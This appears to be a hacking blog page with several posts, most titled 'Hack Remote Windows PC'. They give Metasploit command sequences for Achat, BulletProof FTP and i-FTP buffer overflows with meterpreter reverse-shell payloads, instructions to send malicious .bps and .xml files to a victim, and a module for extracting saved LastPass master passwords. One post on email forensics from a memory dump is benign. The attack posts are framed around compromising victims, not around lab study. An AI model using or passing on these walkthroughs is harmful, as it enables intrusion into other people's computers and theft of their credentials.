Hack Remote Windows PC using Achat Unicode SEH Buffer Overflow

at 12:11 PM Saturday, February 21, 2015 0 comments
This module exploits a Unicode SEH buffer overflow in Achat. By sending a crafted message to the default port 9256/UDP, it's possible to overwrite the SEH handler. Even when the exploit is reliable, it depends on timing since there are two threads overflowing the stack in the same time. This module has been tested on Achat v0.150 running on Windows XP SP3 and Windows 7.

Exploit Targets
Achat v0.150

Requirement
Attacker: kali Linux
Victim PC: Windows XP SP 3


Open Kali terminal type msfconsole


Now type use exploit/windows/misc/achat_bof
msf exploit (achat_bof)>set payload windows/meterpreter/reverse_tcp
msf exploit (achat_bof)>set lhost 192.168.1.7 (IP of Local Host)
msf exploit (achat_bof)>set rhost 192.168.1.8 (IP of Remote Host)
msf exploit (achat_bof)>exploit


Labels: ,

Hack Remote Windows PC using BulletProof FTP Client BPS Buffer Overflow

at 9:10 AM Saturday, January 17, 2015 0 comments
This module exploits stack-based buffer overflow vulnerability in BulletProof FTP Client 2010, caused by an overly long hostname. By persuading the victim to open a specially-crafted .BPS file, a remote attacker could execute arbitrary code on the system or cause the application to crash. This module has been tested successfully on Windows XP SP3.

Exploit Targets
BulletProof FTP Client 2010

Requirement
Attacker: kali Linux
Victim PC: Windows XP 3


Open Kali terminal type msfconsole


Now type use exploit/windows/fileformat/bpftp_client_bps_bof
msf exploit (bpftp_client_bps_bof)>set payload windows/meterpreter/reverse_tcp
msf exploit (bpftp_client_bps_bof)>set lhost 192.168.0.107 (IP of Local Host)
msf exploit (bpftp_client_bps_bof)>exploit


After we successfully generate the malicious bps File, it will stored on your local computer
/root/.msf4/local/msf.bps


Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.107
exploit

Now send your msf.bps files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer.


Labels: ,

Hack Remote Windows PC using i-FTP Schedule Buffer Overflow

at 7:11 AM 0 comments
This module exploits stack-based buffer overflow vulnerability in i-Ftp v2.20, caused by a long time value set for scheduled download. By persuading the victim to place a specially-crafted Schedule.xml file in the i-FTP folder, a remote attacker could execute arbitrary code on the system or cause the application to crash. This module has been tested successfully on Windows XP SP3.

Exploit Targets
i-Ftp v2.20

Requirement
Attacker: kali Linux
Victim PC: Windows XP 3


Open Kali terminal type msfconsole


Now type use exploit/windows/fileformat/iftp_schedule_bof
msf exploit (iftp_schedule_bof)>set payload windows/meterpreter/reverse_tcp
msf exploit (iftp_schedule_bof)>set lhost 192.168.0.107 (IP of Local Host)
msf exploit (iftp_schedule_bof)>exploit


After we successfully generate the malicious xml File, it will stored on your local computer
/root/.msf4/local/schedule.xml


Copy Schedule.xml to C:\Program Files\Memecode\i.Ftp

Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.107
exploit

Now send your schedule.xml files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer.


Labels: ,

How to Collect Email Evidence in Victim PC (Email Forensics)

at 6:43 AM Wednesday, January 14, 2015 0 comments
First capture the victim’s ram using dump it tool. (For details visit here)

Download bulk extractor viewer (from here) and install it in your PC.


Now open bulk extractor viewer and click on to generate report


Now select the dump it image file and select an output folder for the report and click on start bulk extractor as seen below


Now in order to investigate the victim saved information of Email ID Click on email.txt as seen below


And also click on email_histogram.txt

Labels:

Hack Saved LastPass Master Password in Remote Windows, Linux, MAC PC

at 2:20 PM Saturday, November 1, 2014 0 comments
This module extracts and decrypts LastPass master login accounts and passwords

Exploit Targets
lastpass

Requirement
Attacker: kali Linux
Victim PC: Windows 7


Open Kali terminal type msfconsole


Now type use post/multi/gather/lastpass_creds
msf exploit (lastpass_creds)>set payload windows/meterpreter/reverse_tcp
msf exploit (lastpass_creds)>set lhost 192.168.1.103 (IP of Local Host)
msf exploit (lastpass_creds)>set session 1 (IP of Local Host)
msf exploit (lastpass_creds)>exploit

Labels: ,
Subscribe to: Posts (Atom)